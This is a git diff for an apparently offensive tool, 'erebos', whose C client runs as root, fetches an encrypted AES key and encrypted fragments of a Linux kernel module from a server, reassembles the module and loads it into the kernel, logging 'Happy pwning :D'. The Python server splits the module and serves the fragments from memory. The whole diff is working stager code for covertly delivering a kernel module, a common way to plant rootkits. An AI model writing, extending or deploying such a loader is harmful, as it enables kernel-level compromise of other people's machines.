diff --git a/client/src/load.c b/client/src/load.c index 4554107..ca0096e 100644 --- a/client/src/load.c +++ b/client/src/load.c @@ -90,7 +90,7 @@ int load_lkm(const uint8_t *lkm, ssize_t total_size) { return -1; } - log_debug("Module loaded successfully"); + log_info("Module loaded successfully. Happy pwning :D"); close(fdlkm); return 0; diff --git a/client/src/main.c b/client/src/main.c index 1b02bdc..4842d61 100644 --- a/client/src/main.c +++ b/client/src/main.c @@ -9,6 +9,8 @@ #include "../include/log.h" #include "../include/sock.h" #include "../include/utils.h" + +/* server address */ #define SERVER_IP "127.0.0.1" #define SERVER_PORT "8000" @@ -98,33 +100,32 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) { http_res_t http_fraction_res = {0}; fraction_t *fractions = NULL; + char fraction_url[50]; + int i, num_fractions; - int i, num_links; - char *line; + snprintf(fraction_url, 50, "http://%s:%s/stream", SERVER_IP, SERVER_PORT); - if (http_get(sfd, "/", &http_fraction_res) != HTTP_SUCCESS) { + if (http_get(sfd, "/size", &http_fraction_res) != HTTP_SUCCESS) { log_error("Failed to retrieve fraction links"); } log_debug("Retrieved fraction links"); - num_links = count_lines(http_fraction_res.data) + 1; - - log_debug("%d links found", num_links); + num_fractions = atoi(http_fraction_res.data); + log_debug("Fetching %d fractions", num_fractions); - fractions = calloc(num_links, sizeof(fraction_t)); + fractions = calloc(num_fractions, sizeof(fraction_t)); if (!fractions) { log_error("Failed to allocate memory for fractions"); http_free(&http_fraction_res); return NULL; } - + i = 0; - line = strtok(http_fraction_res.data, "\n"); - while (line != NULL && i < num_links) { - log_debug("Downloading %s", line); + while (i < num_fractions) { + log_debug("Downloading fraction no.%d", i); - if (download_fraction(sfd, line, &fractions[i]) != 0) { + if (download_fraction(sfd, fraction_url, &fractions[i]) != 0) { log_error("Failed to download fraction"); // we have to cleanup only until i because the other fractions have not @@ -135,7 +136,6 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) { } i++; - line = strtok(NULL, "\n"); } http_free(&http_fraction_res); @@ -155,58 +155,66 @@ int main(void) { uint8_t *module = NULL; ssize_t module_size; + /* We need root permissions to load LKMs */ if (geteuid() != 0) { log_error("This program needs to be run as root!"); exit(1); } + /* initialize PRNG and set logging level */ init_random(); log_set_level(LOG_DEBUG); + /* open a connection to the server */ sfd = do_connect(); if (sfd < 0) { - return EXIT_FAILURE; + goto cleanup; } + /* receive the AES key */ aes_key = get_aes_key(sfd, &key_len); if (aes_key == NULL) { - close(sfd); - return EXIT_FAILURE; + goto cleanup; } + /* download and sort the fractions*/ fractions = fetch_fractions(sfd, &fraction_count); if (fractions == NULL) { - free(aes_key); - close(sfd); - return EXIT_FAILURE; + goto cleanup; } - - log_info("Downloaded fractions"); - qsort(fractions, fraction_count, sizeof(fraction_t), compare_fractions); + log_info("Downloaded fractions"); + /* decrypt the fractions and assemble the LKM */ module = decrypt_lkm(fractions, fraction_count, &module_size, aes_key); if (module == NULL) { log_error("There was an error creating the module"); cleanup_fraction_array(fractions, fraction_count); - free(aes_key); - close(sfd); - return EXIT_FAILURE; + goto cleanup; } + /* load the LKM in the kernel */ if (load_lkm(module, module_size) < 0) { log_error("Error loading LKM"); - free(module); - cleanup_fraction_array(fractions, fraction_count); - free(aes_key); - close(sfd); - return EXIT_FAILURE; + goto cleanup; } - free(module); + /* cleanup */ + close(sfd); cleanup_fraction_array(fractions, fraction_count); + free(module); free(aes_key); - close(sfd); - return EXIT_SUCCESS; + return EXIT_SUCCESS; // hooray!!! + + /* Encapsulate cleanup */ +cleanup: + if (sfd != -1) close(sfd); + if (fractions) cleanup_fraction_array(fractions, fraction_count); + + free(module); + free(aes_key); + + return EXIT_FAILURE; + } diff --git a/server/fractionator.py b/server/fractionator.py index 56eb8cd..6e3aaa2 100644 --- a/server/fractionator.py +++ b/server/fractionator.py @@ -9,6 +9,7 @@ import zlib + class Fractionator(utils.AES_WITH_IV_HELPER): MAGIC: int = 0xDEADBEEF CHUNK_SIZE: int = 8192 @@ -16,14 +17,13 @@ class Fractionator(utils.AES_WITH_IV_HELPER): algorithm = algorithms.AES256 mode = modes.CBC - def __init__(self, out_path: str, key: bytes) -> None: + def __init__(self, key: bytes) -> None: """Prepare a Fractionator object for reading and generating fractions.""" self.file_path: str = NotImplemented self.file_size: int = 0 - self.out_path: str = out_path self._fractions: list[Fraction] = [] - self.fraction_paths: list[str] = [] + self.fractions: list[bytes] = [] self._buf_reader: Optional[io.BufferedReader] = None @@ -64,62 +64,11 @@ def make_fractions(self) -> None: for i in range(num_chunks): self._make_fraction(i) - def _write_fraction(self, fraction: Fraction) -> None: - """Write a fraction to a file.""" - path = os.path.join( - self.out_path, utils.random_string(Fractionator.FRACTION_PATH_LEN) - ) - with open(path, "wb") as f: - f.write(fraction.header_to_bytes()) - f.write(fraction.data) - self.fraction_paths.append(path) - logging.debug(f"Wrote fraction #{fraction.index} to {path}") - def write_fractions(self) -> None: """Write all fractions to disk.""" - os.makedirs(self.out_path, exist_ok=True) for fraction in self._fractions: - self._write_fraction(fraction) - - def save_backup(self, backup_path: str) -> None: - """Save fraction paths to a backup file.""" - try: - data = "".join((path + "\n" for path in self.fraction_paths)).encode() - - with open(backup_path, "wb") as f: - f.write(zlib.compress(data)) - - logging.debug(f"Backup saved at {backup_path}.") - except OSError as e: - logging.error(f"Failed to save backup: {e}") - - def load_backup(self, backup_path: str) -> None: - """Load fraction paths from a backup file.""" - try: - with open(backup_path, "rb") as f: - data = zlib.decompress(f.read()).decode().split("\n") - self.fraction_paths = [line.strip() for line in data] - - logging.debug(f"Loaded {len(self.fraction_paths)} paths from backup.") - except OSError as e: - logging.error(f"Failed to load backup: {e}") - return - - def _clean_fraction(self, path: str) -> None: - """Delete a fraction file.""" - try: - os.remove(path) - logging.debug(f"Removed {path}.") - except FileNotFoundError: - logging.debug(f"File not found: {path}") - - def clean_fractions(self) -> None: - """Delete all written fractions.""" - logging.info("Cleaning fractions...") - for path in self.fraction_paths: - self._clean_fraction(path) - self.fraction_paths.clear() - logging.info("Cleaning complete.") + fraction_data = fraction.header_to_bytes() + fraction.data + self.fractions.append(fraction_data) def close_stream(self) -> None: """Close the file stream if open.""" @@ -128,11 +77,10 @@ def close_stream(self) -> None: self._buf_reader = None logging.debug(f"Closed stream to {self.file_path}.") - def finalize(self, backup_path: str) -> None: + def finalize(self) -> None: """Create, write and save a backup of the fractions""" self.make_fractions() self.write_fractions() - self.save_backup(backup_path) def __del__(self) -> None: self.close_stream() diff --git a/server/main.py b/server/main.py index 46603f5..cf064b1 100644 --- a/server/main.py +++ b/server/main.py @@ -17,8 +17,6 @@ format="[%(levelname)s: %(funcName)s] %(message)s", level=logging.INFO ) -BACKUP_FILENAME = ".erebos_bckp" - def handle_args(parser: argparse.ArgumentParser): """Configure the given ArgumentParser""" @@ -29,12 +27,6 @@ def handle_args(parser: argparse.ArgumentParser): metavar="ADDRESS", help="bind to this address " "(default: all interfaces)", ) - parser.add_argument( - "-o", - "--output", - default=os.getcwd(), - help="Output directory" "(default: current directory)", - ) parser.add_argument( "port", default=8000, @@ -42,12 +34,6 @@ def handle_args(parser: argparse.ArgumentParser): nargs="?", help="bind to this port " "(default: %(default)s)", ) - parser.add_argument( - "--clean", action="store_true", help="Clean generated fraction files" - ) - parser.add_argument( - "--rm-backup", action="store_true", help="Remove the generated backup file" - ) return parser.parse_args() @@ -71,20 +57,6 @@ def generate_aes_key() -> bytes: return key -def handle_cleanup(fractionator: Fractionator, backup_path: str) -> None: - """Clean up fractions and remove backup file if necessary.""" - if os.path.exists(backup_path): - fractionator.load_backup(backup_path) - fractionator.clean_fractions() - try: - os.remove(backup_path) - logging.info(f"Backup file '{backup_path}' removed.") - except FileNotFoundError: - logging.critical(f"Backup file '{backup_path}' not found.") - else: - logging.warning(f"No file found at '{backup_path}'.") - - if __name__ == "__main__": # ensure dual-stack is not disabled; ref #38907 class DualStackServer(ThreadingHTTPServer): @@ -95,9 +67,7 @@ def server_bind(self): return super().server_bind() def finish_request(self, request, client_address): - self.RequestHandlerClass( - request, client_address, self, directory=args.output - ) + self.RequestHandlerClass(request, client_address, self) # Parse command-line arguments parser = argparse.ArgumentParser( @@ -105,23 +75,15 @@ def finish_request(self, request, client_address): ) args = handle_args(parser) - # Finalize the output/backup paths - out_path = os.path.abspath(args.output) - backup_path = os.path.join(out_path, BACKUP_FILENAME) - # Initialize the fractionator key = generate_aes_key() - fractionator = Fractionator(out_path, key) - - handle_cleanup(fractionator, backup_path) - if args.clean: - sys.exit(0) + fractionator = Fractionator(key) # Set up Fractionator with the provided file path file_path = validate_lkm_object_file(args.file) fractionator.file_path = file_path # Prepare the fractions - fractionator.finalize(backup_path) + fractionator.finalize() # Start the server for staging fractions start_server( @@ -129,4 +91,5 @@ def finish_request(self, request, client_address): port=args.port, bind=args.bind, aes_key=fractionator.key, + fraction_data=fractionator.fractions, ) diff --git a/server/server.py b/server/server.py index 1c64cd3..b1dabaa 100644 --- a/server/server.py +++ b/server/server.py @@ -1,5 +1,4 @@ import sys -import html from http.server import ( HTTPStatus, SimpleHTTPRequestHandler, @@ -8,37 +7,115 @@ ) from cryptography.hazmat.primitives.asymmetric import padding from cryptography.hazmat.primitives import serialization, hashes -import io -import os import base64 import logging +from collections import defaultdict +from itertools import cycle class ErebosHTTPRequestHandler(SimpleHTTPRequestHandler): - """ - HTTP request handler for erebos - - Lists the filenames in the given directory in plain text. - - On POST requests it expects a {"public_key"} field containing an RSA public-key, - and will respond with a AES key encrypted using the public key - """ + server_aes_key: bytes = b"" + fraction_data: list[bytes] = [] + _stream_map = defaultdict(set) + _stream_iterators = {} + + @property + def identifier(self) -> int: + """A unique identifier for each client""" + return hash(self.client_address[0] + str(self.client_address[1])) + + @property + def fraction_num(self) -> int: + """The amount of elements in the fraction_data attribute""" + return len(self.fraction_data) + + def get_stream_iterator(self): + """ + Accesses the stream iterator for the current client-specific stream, ensuring a unique + stream for each client IP. + """ - server_aes_key: bytes = NotImplemented + if self.identifier not in self._stream_map: + if self.fraction_data: # Check if there is data to populate + self._stream_map[self.identifier].update(self.fraction_data) + self._stream_iterators[self.identifier] = cycle( + self._stream_map[self.identifier] + ) + logging.info(f"{self.identifier}") + else: + # Handle case where fraction_data is empty + self._stream_map[self.identifier] = set() + self._stream_iterators[self.identifier] = iter([]) # Empty iterator + + return self._stream_iterators[self.identifier] + + def do_GET(self): + """Serve a GET request.""" + if self.path == "/stream": + self.handle_stream_endpoint() + elif self.path == "/size": + self.handle_size_endpoint() + else: + self.send_error(404, f"{self.path} does not exist") + + def handle_stream_endpoint(self): + """Handles the /stream endpoint, sending the next fraction to the client.""" + stream_iterator = self.get_stream_iterator() + data = next(stream_iterator) + + self._send_response(data) + + def handle_size_endpoint(self): + """Handles the /size endpoint, sending the number of fractions.""" + data = str(self.fraction_num).encode() + self._send_response(data) + + def _send_response(self, data: bytes): + """Send a response with given data.""" + try: + self.send_response(200) + self.send_header("Content-type", "text/plain") + self.send_header("Content-Length", str(len(data))) + self.end_headers() + self.wfile.write(data) + except (ConnectionError, BrokenPipeError): + # Client disconnected or network issue + logging.error("Connection error: Client may have disconnected.") + except Exception as e: + logging.error(f"Unexpected error while sending response: {e}") + + def finish(self): + """Called after each request and handles cleanup if a client has disconnected""" + + # Remove the clients queue from the stream map + if ( + self.headers.get("Connection", "") == "close" + and self.identifier in self._stream_map + ): + logging.info( + f"[{self.address_string()}] Disconnected. Wasted {len(self._stream_map[self.identifier])} fractions." + ) + del self._stream_map[self.identifier] + super().finish() def do_POST(self): + """Handle POST requests to encrypt and send the AES key.""" # Read the content length and the raw data from the POST request - content_length = int(self.headers["Content-Length"]) # Get the size of data - public_key_pem = self.rfile.read(content_length) # Read the request body (bytes) - - if public_key_pem is None: + content_length = int( + self.headers.get("Content-Length", 0) + ) # Get the size of data + if not content_length: self.send_error(400, "No data in request body") logging.error("No data found in request body") return + public_key_pem = self.rfile.read( + content_length + ) # Read the request body (bytes) + # Load the public key provided by the client try: - client_public_key = serialization.load_pem_public_key( - public_key_pem - ) + client_public_key = serialization.load_pem_public_key(public_key_pem) except Exception as e: self.send_error(400, f"Invalid public key format: {str(e)}") logging.error(f"Received invalid public key format from client: {str(e)}") @@ -61,59 +138,14 @@ def do_POST(self): return # Send HTTP response with the encrypted AES key - self.send_response(200) - self.send_header("Content-type", "plain/text") - self.send_header("Content-Length", str(len(base64_encoded_aes_key))) - self.end_headers() - - self.wfile.write(base64_encoded_aes_key) - + self._send_response(base64_encoded_aes_key) logging.info(f"Successfully sent encrypted AES key to the client.") - - def list_directory(self, path): - """ - Helper to produce a directory listing (absent index.html). - The directory listing (text/plain) contains links to the files in the specified directory. - - Return value is either a file object, or None (indicating an - error). In either case, the headers are sent, making the - interface the same as for send_head(). - - """ - try: - file_list = os.listdir(path) - except OSError: - self.send_error(HTTPStatus.NOT_FOUND, "No permission to list directory") - return None - - file_list.sort(key=lambda a: a.lower()) - contents = [] - - enc = sys.getfilesystemencoding() - - server_addr = self.server.server_address - host, port = server_addr - for name in file_list: - if name != ".erebos_bckp": - display_name = f"http://{host}:{port}{self.path}{name}" - contents.append(html.escape(display_name, quote=False)) - - encoded = "\n".join(contents).encode(enc, "surrogateescape") - f = io.BytesIO() - f.write(encoded) - f.seek(0) - - self.send_response(HTTPStatus.OK) - self.send_header("Content-type", f"text/plain; charset={enc}") - self.send_header("Content-Length", str(len(encoded))) - self.end_headers() - - return f def serve( HandlerClass, aes_key: bytes, + fraction_data: list[bytes], ServerClass=ThreadingHTTPServer, protocol="HTTP/1.0", port=8000, @@ -128,6 +160,7 @@ def serve( HandlerClass.protocol_version = protocol HandlerClass.server_aes_key = aes_key + HandlerClass.fraction_data = fraction_data with ServerClass(addr, HandlerClass) as httpd: host, port = httpd.socket.getsockname()[:2] @@ -142,7 +175,9 @@ def serve( sys.exit(0) -def start_server(ServerClass, aes_key: bytes, port: int = 8000, bind=None): +def start_server( + ServerClass, aes_key: bytes, fraction_data: list[bytes], port: int = 8000, bind=None +): serve( HandlerClass=ErebosHTTPRequestHandler, ServerClass=ServerClass, @@ -150,4 +185,5 @@ def start_server(ServerClass, aes_key: bytes, port: int = 8000, bind=None): port=port, bind=bind, aes_key=aes_key, + fraction_data=fraction_data, )